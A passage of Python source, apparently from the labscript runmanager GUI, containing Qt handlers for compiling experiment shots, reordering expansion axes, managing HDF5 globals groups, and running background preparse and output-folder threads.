self.ui.lineEdit_labscript_file.setToolTip(text)
self.previous_default_output_folder = self.get_default_output_folder()
def on_shot_output_folder_text_changed(self, text):
# Blank out the 'reset default output folder' button if the user is
# already using the default output folder
if text == self.get_default_output_folder():
self.non_default_folder = False
else:
self.non_default_folder = True
self.ui.toolButton_reset_shot_output_folder.setEnabled(self.non_default_folder)
self.ui.label_non_default_folder.setVisible(self.non_default_folder)
self.ui.lineEdit_shot_output_folder.setToolTip(text)
def on_engage_clicked(self):
logger.info('Engage')
try:
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
labscript_file = self.ui.lineEdit_labscript_file.text()
# even though we shuffle on a per global basis, if ALL of the globals are set to shuffle, then we may as well shuffle again. This helps shuffle shots more randomly than just shuffling within each level (because without this, you would still do all shots with the outer most variable the same, etc)
shuffle = self.ui.pushButton_shuffle.checkState() == QtCore.Qt.Checked
if not labscript_file:
raise Exception('Error: No labscript file selected')
output_folder = self.ui.lineEdit_shot_output_folder.text()
if not output_folder:
raise Exception('Error: No output folder selected')
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
logger.info('Parsing globals...')
active_groups = self.get_active_groups()
# Get ordering of expansion globals
expansion_order = {}
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
name = item.data(self.AXES_ROLE_NAME)
expansion_order[name] = {'order':i, 'shuffle':shuffle_item.checkState()}
try:
sequenceglobals, shots, evaled_globals, global_hierarchy, expansions = self.parse_globals(active_groups, expansion_order=expansion_order)
except Exception as e:
raise Exception('Error parsing globals:\n%s\nCompilation aborted.' % str(e))
logger.info('Making h5 files')
labscript_file, run_files = self.make_h5_files(
labscript_file, output_folder, sequenceglobals, shots, shuffle)
self.ui.pushButton_abort.setEnabled(True)
self.compile_queue.put([labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer])
except Exception as e:
self.output_box.output('%s\n\n' % str(e), red=True)
logger.info('end engage')
def on_abort_clicked(self):
self.compilation_aborted.set()
def on_restart_subprocess_clicked(self):
# Kill and restart the compilation subprocess
self.to_child.put(['quit', None])
self.from_child.put(['done', False])
time.sleep(0.1)
self.output_box.output('Asking subprocess to quit...')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=False))
def check_child_exited(self, timeout_time, kill=False):
self.child.poll()
if self.child.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill))
return
elif self.child.returncode is None:
if not kill:
self.child.terminate()
self.output_box.output('not responding.\n')
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50, lambda: self.check_child_exited(timeout_time, kill=True))
return
else:
self.child.kill()
self.output_box.output('Killed\n', red=True)
elif kill:
self.output_box.output('Terminated\n', red=True)
else:
self.output_box.output('done.\n')
self.output_box.output('Spawning new compiler subprocess...')
self.to_child, self.from_child, self.child = process_tree.subprocess(
'batch_compiler.py', output_redirection_port=self.output_box.port
)
self.output_box.output('done.\n')
self.output_box.output('Ready.\n\n')
def on_tabCloseRequested(self, index):
tab_page = self.ui.tabWidget.widget(index)
for (globals_file, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
self.close_group(globals_file, group_name)
break
def on_treeView_axes_context_menu_requested(self, point):
raise NotImplementedError
# menu = QtWidgets.QMenu(self.ui)
# menu.addAction(self.action_axes_check_selected)
# menu.addAction(self.action_axes_uncheck_selected)
# menu.exec_(QtGui.QCursor.pos())
pass
def on_axes_check_selected_triggered(self, *args):
raise NotImplementedError
def on_axes_uncheck_selected_triggered(self, *args):
raise NotImplementedError
def on_axis_to_top_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
self.update_axes_indentation()
def on_axis_up_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
self.update_axes_indentation()
def on_axis_down_clicked(self, checked):
# Get the selection model from the treeview
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
self.update_axes_indentation()
def on_axis_to_bottom_clicked(self, checked):
selection_model = self.ui.treeView_axes.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self.axes_model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self.axes_model.takeRow(row)
# Add the selected row into a position one above
self.axes_model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self.axes_model.indexFromItem(items[0]),QtCore.QItemSelectionModel.SelectCurrent|QtCore.QItemSelectionModel.Rows)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
self.update_axes_indentation()
def on_axes_item_changed(self, item):
if item.column() == self.AXES_COL_SHUFFLE:
self.update_global_shuffle_state()
def update_global_shuffle_state(self, *args, **kwargs):
all_checked = True
none_checked = True
for i in range(self.axes_model.rowCount()):
check_state = self.axes_model.item(i, self.AXES_COL_SHUFFLE).checkState() == QtCore.Qt.Checked
all_checked = all_checked and check_state
none_checked = none_checked and not check_state
if not all_checked and not none_checked:
self.ui.pushButton_shuffle.setTristate(True)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.PartiallyChecked)
elif none_checked and not all_checked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Unchecked)
elif all_checked and not none_checked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Checked)
else:
# No axes. Set if partially checked, otherwise else leave it alone:
if self.ui.pushButton_shuffle.checkState() == QtCore.Qt.PartiallyChecked:
self.ui.pushButton_shuffle.setTristate(False)
self.ui.pushButton_shuffle.setCheckState(QtCore.Qt.Checked)
def on_master_shuffle_clicked(self, state):
if state in [QtCore.Qt.Checked, QtCore.Qt.Unchecked]:
self.ui.pushButton_shuffle.setTristate(False)
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
if item.checkState() != state:
self.axes_model.item(i, self.AXES_COL_SHUFFLE).setCheckState(state)
def on_treeView_groups_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_groups_set_selection_active)
menu.addAction(self.action_groups_set_selection_inactive)
menu.addAction(self.action_groups_delete_selected)
menu.addAction(self.action_groups_open_selected)
menu.addAction(self.action_groups_close_selected_groups)
menu.addAction(self.action_groups_close_selected_files)
copy_menu = QtWidgets.QMenu('Copy selected group(s) to...', menu)
copy_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document-copy'))
menu.addMenu(copy_menu)
move_menu = QtWidgets.QMenu('Move selected group(s) to...', menu)
move_menu.setIcon(QtGui.QIcon(':/qtutils/fugue/blue-document--arrow'))
menu.addMenu(move_menu)
# Create a dict of all filepaths -> filenames
filenames = {}
for index in range(self.groups_model.rowCount()):
filepath = self.groups_model.item(index, self.GROUPS_COL_NAME).text()
filenames[filepath] = filepath.split(os.sep)[-1]
# expand duplicate filenames until there is nomore duplicates
new_filename = {}
i = 2
while new_filename != filenames:
for filepath, filename in filenames.items():
if list(filenames.values()).count(filename) > 1:
new_filename[filepath] = os.sep.join(filepath.split(os.sep)[-i:])
else:
new_filename[filepath] = filename
filenames = new_filename
i += 1
# add all filenames to the copy and move submenu
for filepath, filename in filenames.items():
copy_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, False))
move_menu.addAction(filename, lambda filepath=filepath: self.on_groups_copy_selected_groups_triggered(filepath, True))
menu.exec_(QtGui.QCursor.pos())
def on_groups_copy_selected_groups_triggered(self, dest_globals_file=None, delete_source_group=False):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
source_globals_file = item.parent().text()
self.copy_group(source_globals_file, item.text(), dest_globals_file, delete_source_group)
def on_groups_set_selection_active_triggered(self, checked_state):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
# Filter to only include the 'active' column:
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
active_items = (item for item in selected_items
if item.column() == self.GROUPS_COL_ACTIVE
and item.parent() is not None)
for item in active_items:
item.setCheckState(checked_state)
def on_groups_delete_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# If multiple selected, show 'delete n groups?' message. Otherwise,
# pass confirm=True to self.delete_group so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d groups?" % len(name_items)):
return
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
self.delete_group(globals_file, group_name, confirm=not confirm_multiple)
def on_groups_open_selected_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = [self.groups_model.itemFromIndex(index) for index in selected_indexes]
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
# Include all grous of selected globals files:
for item in selected_items:
if item.parent() is None:
children = [item.child(i) for i in range(item.rowCount())]
# Exclude <add new group> item, which is not selectable
name_items += [child for child in children if child.isSelectable() ]
filenames = set(item.parent().text() for item in name_items)
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name, trigger_preparse=False)
if name_items:
self.globals_changed()
def on_groups_close_selected_groups_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is not None]
for item in name_items:
globals_file = item.parent().text()
group_name = item.text()
if (globals_file, group_name) in self.currently_open_groups:
self.close_group(globals_file, group_name)
def on_groups_close_selected_files_triggered(self):
selected_indexes = self.ui.treeView_groups.selectedIndexes()
selected_items = (self.groups_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items
if item.column() == self.GROUPS_COL_NAME
and item.parent() is None]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE)
for item in name_items
for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if any(child_is_open):
if not question_dialog('Close %d file(s)? This will close %d currently open group(s).' %
(len(name_items), child_is_open.count(True))):
return
for item in name_items:
globals_file = item.text()
self.close_globals_file(globals_file, confirm=False)
def on_open_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
if not os.path.isfile(globals_file):
error_dialog("No such file %s." % globals_file)
return
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Open the file:
self.open_globals_file(globals_file)
def on_new_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Create new globals file',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
globals_file = os.path.abspath(globals_file)
# Save the containing folder for use next time we open the dialog box:
self.last_opened_globals_folder = os.path.dirname(globals_file)
# Create the new file and open it:
runmanager.new_globals_file(globals_file)
self.open_globals_file(globals_file)
def on_diff_globals_file_clicked(self):
globals_file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select globals file to compare',
self.last_opened_globals_folder,
"HDF5 files (*.h5)")
if type(globals_file) is tuple:
globals_file, _ = globals_file
if not globals_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
globals_file = os.path.abspath(globals_file)
# Get runmanager's globals
active_groups = self.get_active_groups()
if active_groups is None:
# Invalid group selection
return
# Get file's globals groups
other_groups = runmanager.get_all_groups(globals_file)
# Display the output tab so the user can see the output:
self.ui.tabWidget.setCurrentWidget(self.ui.tab_output)
self.output_box.output('Globals diff with:\n%s\n\n' % globals_file)
# Do the globals diff
globals_diff_table = runmanager.globals_diff_groups(active_groups, other_groups)
self.output_box.output(globals_diff_table)
self.output_box.output('Ready.\n\n')
def on_treeView_groups_leftClicked(self, index):
"""Here we respond to user clicks on the treeview. We do the following:
- If the user clicks on the <click to add group> dummy row, we go into
edit mode on it so they can enter the name of the new group they
want.
- If the user clicks on the icon to open or close a globals file or a
group, we call the appropriate open and close methods and update the
open/close data role on the model.
- If the user clicks delete on a globals group, we call a delete
method, which deletes it after confirmation, and closes it if it was
open.
"""
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.groups_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
# The parent item, None if there is no parent:
parent_item = item.parent()
# What kind of row did the user click on?
# A globals file, a group, or a 'click to add group' row?
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new group' row. Enter editing
# mode on the name item so they can enter a name for
# the new group:
self.ui.treeView_groups.setCurrentIndex(name_index)
self.ui.treeView_groups.edit(name_index)
if item.column() == self.GROUPS_COL_ACTIVE:
# They clicked on the active column. Toggle the checkbox. We do
# this manually because setting the item checkable means the model
# changes before we catch the mouse click. This is a pain because
# we want the ensuing sorting (if the user is sorting by the
# enabled column) to keep the the selection. If the user only
# selected the column by clicking on it, then the sort happens
# before they selected it, and the resort happens without a visual
# indication of where the item went, because it never got
# selected.
state = item.checkState()
if state in (QtCore.Qt.Unchecked, QtCore.Qt.PartiallyChecked):
item.setCheckState(QtCore.Qt.Checked)
elif state == QtCore.Qt.Checked:
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('Invalid Check state')
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, item)
elif parent_item is None:
# They clicked on a globals file row.
globals_file = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the close button. Close the file:
self.close_globals_file(globals_file)
else:
# They clicked on a globals group row.
globals_file = parent_item.text()
group_name = name_item.text()
# What column did they click on?
if item.column() == self.GROUPS_COL_DELETE:
# They clicked the delete button. Delete the group:
self.delete_group(globals_file, group_name, confirm=True)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
# They clicked the open/close button. Which is it, open or close?
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
if group_is_open:
self.close_group(globals_file, group_name)
else:
self.open_group(globals_file, group_name)
def on_treeView_groups_doubleLeftClicked(self, index):
item = self.groups_model.itemFromIndex(index)
# The parent item, None if there is no parent:
parent_item = item.parent()
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
return
elif parent_item and item.column() == self.GROUPS_COL_NAME:
# it's a group name item. What's the group and file name?
globals_file = parent_item.text()
group_name = item.text()
if (globals_file, group_name) not in self.currently_open_groups:
self.open_group(globals_file, group_name)
# Focus the tab:
group_tab = self.currently_open_groups[globals_file, group_name]
for i in range(self.ui.tabWidget.count()):
if self.ui.tabWidget.widget(i) is group_tab.ui:
self.ui.tabWidget.setCurrentIndex(i)
break
def on_groups_model_item_changed(self, item):
"""This function is for responding to data changes in the model. The
methods for responding to changes different columns do different
things. Mostly they make other data changes for model consistency, but
also group creation and renaming is handled in response to changes to
the 'name' column. When we change things elsewhere, we prefer to only
change one thing, and the rest of the changes are triggered here. So
here we do the following:
Be careful not to recurse unsafely into this method - changing
something that itself triggers further changes is fine so long as they
peter out and don't get stuck in a loop. If recursion needs to be
stopped, one can disconnect the signal temporarily with the context
manager self.groups_model_item_changed_disconnected. But use this
sparingly, otherwise there's the risk that some required data updates
will be forgotten about and won't happen.
"""
if item.column() == self.GROUPS_COL_NAME:
self.on_groups_model_name_changed(item)
elif item.column() == self.GROUPS_COL_ACTIVE:
self.on_groups_model_active_changed(item)
elif item.column() == self.GROUPS_COL_OPENCLOSE:
self.on_groups_model_openclose_changed(item)
def on_groups_model_name_changed(self, item):
"""Handles group renaming and creation of new groups due to the user
editing the <click to add group> item"""
parent_item = item.parent()
# File rows are supposed to be uneditable, but just to be sure we have
# a group row:
assert parent_item is not None
if item.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
item_text = item.text()
if item_text != self.GROUPS_DUMMY_ROW_TEXT:
# The user has made a new globals group by editing the <click
# to add group> item.
globals_file = parent_item.text()
group_name = item_text
self.new_group(globals_file, group_name)
else:
# User has renamed a globals group.
new_group_name = item.text()
previous_group_name = item.data(self.GROUPS_ROLE_PREVIOUS_NAME)
# Ensure it truly is a name change, and not something else about
# the item changing:
if new_group_name != previous_group_name:
globals_file = parent_item.text()
self.rename_group(globals_file, previous_group_name, new_group_name)
def on_groups_model_active_changed(self, item):
"""Sets the sort data for the item in response to its check state
changing. Also, if this is the first time this function has been
called on the stack, that is, the change was initiated externally
instead of via recursion from this function itself, then set the check
state of other items for consistency. This entails checking/unchecking
all group rows in response to the file row's check state changing, or
changing the file row's check state to reflect the check state of the
child group rows. That's why we need to keep track of the recursion
depth - so that those changes we make don't in turn cause further
changes. But we don't disconnect the on_changed signal altogether,
because we still want to do the update of the sort data, and anything
else that might be added in future."""
self.on_groups_model_active_changed_recursion_depth += 1
try:
check_state = item.checkState()
# Ensure sort data matches active state:
item.setData(check_state, self.GROUPS_ROLE_SORT_DATA)
if self.on_groups_model_active_changed_recursion_depth > 1:
# Prevent all below code from running in response to data changes
# initiated from within this method itself. The code above this
# check still runs in response to all changes.
return
parent_item = item.parent()
if parent_item is not None:
# A 'group active' checkbox changed due to external action (not from this method itself).
# Update the parent file checkbox to reflect the state of its children
children = [parent_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(parent_item.rowCount())]
child_states = [child.checkState() for child in children
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
parent_active_index = parent_item.index().sibling(parent_item.index().row(), self.GROUPS_COL_ACTIVE)
parent_active_item = self.groups_model.itemFromIndex(parent_active_index)
if all(state == QtCore.Qt.Checked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Checked)
elif all(state == QtCore.Qt.Unchecked for state in child_states):
parent_active_item.setCheckState(QtCore.Qt.Unchecked)
else:
parent_active_item.setCheckState(QtCore.Qt.PartiallyChecked)
else:
# A 'file active' checkbox changed due to external action (not from this method itself).
# Update the check state of all children to match.
name_index = item.index().sibling(item.index().row(), self.GROUPS_COL_NAME)
name_item = self.groups_model.itemFromIndex(name_index)
checkstate = item.checkState()
children = [name_item.child(i, self.GROUPS_COL_ACTIVE) for i in range(name_item.rowCount())]
for child in children:
if not child.data(self.GROUPS_ROLE_IS_DUMMY_ROW):
child.setCheckState(checkstate)
finally:
self.on_groups_model_active_changed_recursion_depth -= 1
if self.on_groups_model_active_changed_recursion_depth == 0:
self.do_model_sort()
# Trigger a preparse to occur:
self.globals_changed()
def on_groups_model_openclose_changed(self, item):
"""Sets item sort data and icon in response to the open/close state of a group
changing."""
parent_item = item.parent()
# The open/close state of a globals group changed. It is definitely a
# group, not a file, as the open/close state of a file shouldn't be
# changing.
assert parent_item is not None # Just to be sure.
# Ensure the sort data matches the open/close state:
group_is_open = item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
item.setData(group_is_open, self.GROUPS_ROLE_SORT_DATA)
# Set the appropriate icon and tooltip. Changing the icon causes
# itemChanged to be emitted, even if it the same icon, and even if we
# were to use the same QIcon instance. So to avoid infinite recursion
# we temporarily disconnect the signal whilst we set the icons.
with self.groups_model_item_changed_disconnected:
if group_is_open:
item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
item.setToolTip('Close globals group.')
else:
item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
item.setToolTip('Load globals group into runmanager.')
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, item)
@inmain_decorator()
def get_default_output_folder(self):
"""Returns what the default output folder would be right now, based on
the current date and selected labscript file. Returns empty string if
no labscript file is selected. Does not create the default output
folder, does not check if it exists."""
current_labscript_file = self.ui.lineEdit_labscript_file.text()
if not current_labscript_file:
return ''
_, default_output_folder, _ = runmanager.new_sequence_details(
current_labscript_file,
config=self.exp_config,
increment_sequence_index=False,
)
default_output_folder = os.path.normpath(default_output_folder)
return default_output_folder
def rollover_shot_output_folder(self):
"""Runs in a thread, checking every 30 seconds if the default output folder has
changed, likely because the date has changed, but also possible because another
instance of runmanager has incremented the sequence index. If the defaulr output
folder has changed, and if runmanager is configured to use the default output
folder, sets the folder in which compiled shots will be put. Does not create the
folder if it does not already exist, this will be done at compile-time."""
while True:
time.sleep(30)
try:
self.check_output_folder_update()
except Exception as e:
# Don't stop the thread.
logger.exception("error checking default output folder")
@inmain_decorator()
def check_output_folder_update(self):
"""Do a single check of whether the output folder needs updating. This
is implemented as a separate function to the above loop so that the
whole check happens at once in the Qt main thread and hence is atomic
and can't be interfered with by other Qt calls in the program."""
current_default_output_folder = self.get_default_output_folder()
if current_default_output_folder is None:
# No labscript file selected:
return
currently_selected_output_folder = self.ui.lineEdit_shot_output_folder.text()
if current_default_output_folder != self.previous_default_output_folder:
# It's a new day, or a new labscript file.
# Is the user using default folders?
if currently_selected_output_folder == self.previous_default_output_folder:
# Yes they are. In that case, update to use the new folder:
self.ui.lineEdit_shot_output_folder.setText(current_default_output_folder)
self.previous_default_output_folder = current_default_output_folder
@inmain_decorator()
def globals_changed(self):
"""Called from either self, a GroupTab, or the RemoteServer to inform runmanager
that something about globals has changed, and that they need parsing again."""
self.ui.pushButton_engage.setEnabled(False)
self.preparse_globals_required.put(None)
def update_axes_indentation(self):
for i in range(self.axes_model.rowCount()):
item = self.axes_model.item(i, self.AXES_COL_NAME)
text = item.text().lstrip()
text = ' '*i + text
item.setText(text)
@inmain_decorator() # Is called by preparser thread
def update_axes_tab(self, expansions, dimensions):
# get set of expansions
expansion_list = []
for global_name, expansion in expansions.items():
if expansion:
if expansion == 'outer':
expansion_list.append('outer '+global_name)
else:
expansion_list.append('zip '+expansion)
expansion_list = set(expansion_list)
# find items to delete
for i in reversed(range(self.axes_model.rowCount())):
item = self.axes_model.item(i, self.AXES_COL_NAME)
name = item.data(self.AXES_ROLE_NAME)
if name not in expansion_list:
item = self.axes_model.takeRow(i)
del item
else:
length_item = self.axes_model.item(i, self.AXES_COL_LENGTH)
if name in dimensions:
length_item.setText("{}".format(dimensions[name]))
else:
length_item.setText('Unknown')
# remove from expansions list so we don't add it again
expansion_list.remove(name)
# add new rows
for expansion_name in expansion_list:
shuffle = self.ui.pushButton_shuffle.checkState() != QtCore.Qt.Unchecked
self.add_item_to_axes_model(expansion_name, shuffle, dimensions)
self.update_axes_indentation()
def add_item_to_axes_model(self, expansion_name, shuffle, dimensions = None):
if dimensions is None:
dimensions = {}
items = []
expansion_type, name = expansion_name.split()
name_item = QtGui.QStandardItem(name)
name_item.setData(expansion_name, self.AXES_ROLE_NAME)
if expansion_type == 'outer':
name_item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
else:
name_item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
items.append(name_item)
length = 'Unknown'
if expansion_name in dimensions:
length = "{}".format(dimensions[expansion_name])
length_item = QtGui.QStandardItem(length)
items.append(length_item)
shuffle_item = QtGui.QStandardItem()
shuffle_item.setCheckable(True)
shuffle_item.setCheckState(QtCore.Qt.Checked if shuffle else QtCore.Qt.Unchecked)
items.append(shuffle_item)
self.axes_model.appendRow(items)
@inmain_decorator() # Is called by preparser thread
def update_tabs_parsing_indication(self, active_groups, sequence_globals, evaled_globals, n_shots):
for group_tab in self.currently_open_groups.values():
group_tab.update_parse_indication(active_groups, sequence_globals, evaled_globals)
self.ui.pushButton_engage.setEnabled(True)
if n_shots == 1:
n_shots_string = '(1 shot)'
else:
n_shots_string = '({} shots)'.format(n_shots)
self.ui.pushButton_engage.setText('Engage {}'.format(n_shots_string))
def preparse_globals(self):
active_groups = self.get_active_groups()
if active_groups is None:
# There was an error, get_active_groups has already shown
# it to the user.
return
# Expansion mode is automatically updated when the global's
# type changes. If this occurs, we will have to parse again to
# include the change:
while True:
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=False, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
self.n_shots = len(shots)
expansions_changed = self.guess_expansion_modes(
active_groups, evaled_globals, global_hierarchy, expansions)
if not expansions_changed:
# Now expand globals while parsing to calculate the number of shots.
# this must only be done after the expansion type guessing has been updated to avoid exceptions
# when changing a zip group from a list to a single value
results = self.parse_globals(active_groups, raise_exceptions=False, expand_globals=True, return_dimensions = True)
sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions = results
self.n_shots = len(shots)
break
self.update_tabs_parsing_indication(active_groups, sequence_globals, evaled_globals, self.n_shots)
self.update_axes_tab(expansions, dimensions)
def preparse_globals_loop(self):
"""Runs in a thread, waiting on a threading.Event that tells us when
some globals have changed, and calls parse_globals to evaluate them
all before feeding the results back to the relevant tabs to be
displayed."""
while True:
try:
# Wait until we're needed:
self.preparse_globals_required.get()
n_requests = 1
# Wait until the main thread is idle before clearing the queue of
# requests. This way if preparsing is triggered multiple times within
# the main thread before it becomes idle, we can respond to this all at
# once, once they are all done, rather than starting too early and
# having to preparse again.
with qtlock:
while True:
try:
self.preparse_globals_required.get(block=False)
n_requests += 1
except queue.Empty:
break
# Do some work:
self.preparse_globals()
# Tell any callers calling preparse_globals_required.join() that we are
# done with their request:
for _ in range(n_requests):
self.preparse_globals_required.task_done()
except Exception:
# Raise the error, but keep going so we don't take down the
# whole thread if there is a bug.
exc_info = sys.exc_info()
raise_exception_in_thread(exc_info)
def wait_until_preparse_complete(self):
"""Block until the preparse loop has finished pending work"""
self.preparse_globals_required.join()
def get_group_item_by_name(self, globals_file, group_name, column, previous_name=None):
"""Returns an item from the row representing a globals group in the
groups model. Which item is returned is set by the column argument."""
parent_item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
possible_name_items = self.groups_model.findItems(group_name, QtCore.Qt.MatchRecursive,
column=self.GROUPS_COL_NAME)
# Don't accidentally match on other groups or files with the same name
# as this group:
possible_name_items = [item for item in possible_name_items if item.parent() == parent_item]
if previous_name is not None:
# Also filter by previous name, useful for telling rows apart when
# a rename is in progress and two rows may temporarily contain the
# same name (though the rename code with throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GROUPS_ROLE_PREVIOUS_NAME) == previous_name]
elif group_name != self.GROUPS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new group is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GROUPS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
